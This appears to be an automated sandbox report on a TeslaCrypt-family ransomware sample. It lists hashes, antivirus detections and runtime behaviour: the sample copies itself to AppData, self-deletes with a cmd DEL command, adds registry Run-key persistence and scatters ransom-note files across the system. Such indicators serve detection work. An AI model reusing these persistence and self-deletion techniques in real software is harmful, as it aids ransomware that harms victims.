Analysis Date: 2016-02-12 21:31:17
MD5: 835c49402c922868ab7f39d8074d9a81
SHA1: c4309ab1af87f4c7e3ce94813491892fcc79d39e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .coat  md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section .cbbl  md5: 24e13c61272b17ba94c55a5fe742ec7b sha1: 7039252da5c856fe0a3537605d65cd20151b76e3 size: 141824
Section .rdata md5: b83c9a1827a721cd28138eb26cf711d1 sha1: 34dea5a397948b518a683adee133669e3014c87c size: 58880
Section .data  md5: 231ba7231b52ce74848e56b677041e23 sha1: 64591647569ecea096090a4a7bd5d5890b542e7e size: 37888
Section .rsrc  md5: 80d69ece30522c2c00ebde7d20f9907f sha1: cdcd0e5366058dee3ac70fa43ce83b61d3b10a95 size: 187904
Timestamp: 2016-02-08 21:59:28
Packer: Microsoft Visual C++ ?.?
PEhash: d06b61389b1b1842b60162ca55fb084a27fbeeb5
IMPhash: bd2a8f9ba380f160b10d2209983a6ae7
AV CA (E-Trust Ino): Gen:Variant.Symmi.60982
AV Rising: No Virus
AV Mcafee: BackDoor-FDCH!835C49402C92
AV Avira (antivir): TR/Crypt.Xpack.445768
AV Twister: Trojan.Cap1621223.qdwg
AV Ad-Aware: Gen:Variant.Symmi.60982
AV Alwil (avast): Win32:Trojan-gen
AV Eset (nod32): Win32/Kryptik.ENJD
AV Grisoft (avg): Generic37.ALQI
AV Symantec: Trojan.Cryptlock.N!g2
AV Fortinet: W32/Generic.AC.3397816
AV BitDefender: Gen:Variant.Symmi.60982
AV K7: Trojan ( 004ddcd41 )
AV Microsoft Security Essentials: Ransom:Win32/Tescrypt!rfn
AV MicroWorld (escan): Gen:Variant.Zusy.181890
AV MalwareBytes: Trojan.MalPack.PK
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Emsisoft: Gen:Variant.Symmi.60982
AV Frisk (f-prot): W32/Agent.XL.gen!Eldorado
AV Ikarus: No Virus
AV Zillya!: Trojan.Kryptik.Win32.861347
AV Kaspersky: Trojan-Ransom.Win32.Blocker.ibeq
AV Trend Micro: No Virus
AV VirusBlokAda (vba32): No Virus
AV CAT (quickheal): Ransom.Crowti.WR7
AV BullGuard: Gen:Variant.Zusy.181890
AV Arcabit (arcavir): Gen:Variant.Symmi.60982
AV ClamAV: No Virus
AV Dr. Web: Trojan.Inject1.56622
AV F-Secure: Gen:Variant.Zusy.181890

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\gukyrts.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\gukyrts.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\C4309A~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\C4309A~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\gukyrts.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\gukyrts.exe\\x00
Registry: HKEY_CURRENT_USER\Software\4038526C822C32B2\data ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\gukyrts.exe\\x00
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_pjkeqiwvr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.png
